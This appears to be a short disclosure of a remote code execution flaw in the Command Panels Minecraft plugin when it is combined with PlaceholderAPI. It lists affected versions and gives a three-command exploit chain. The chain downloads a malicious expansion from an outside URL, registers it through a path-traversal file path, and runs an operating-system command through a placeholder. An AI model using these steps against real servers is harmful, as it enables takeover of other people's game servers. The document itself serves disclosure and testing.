Command Panels is a powerful Minecraft plugin that allows you to easily create custom GUIs using simple YAML files. The problem lies in the fact that this plugin allows you to download extensions from any link. When combined with other plugins, attackers can perform remote code execution (RCE).
The exploit is based on using the /cpi command to download a malicious expansion that attackers can combine with plugins such as PlaceholderAPI or Plugman to compromise the server.
To perform this exploit, the CommandPanels /cpi command
must be enabled, then enter the following:
In this example, a malicious test extension created by me is attached. This allows us to use the malicious extension via PlaceholderAPI Commands can now be executed remotely by calling the expansion's position placeholder. You must place the command separated by _ instead of spaces, in this example I use a command to open the notepad of my PC where the server is hosted. 01 Download the malicious extension or plugin
$ /cpi rce https://mcptoolexpansionjar.mcptool.net 02 Register expansion placeholder
$ /papi register ../../CommandPanels/panels/rce.yml 03 Run a command on the server operating system
$ /papi parse me %rce_notepad.exe%
Vulnerable versions of the CommandPanels plugin: 3.19.0.3 and below.
Vulnerable versions of the PlaceholderAPI plugin: 2.11.3 and below.
You can download a server with everything you need to test the exploit locally on your PC from this link.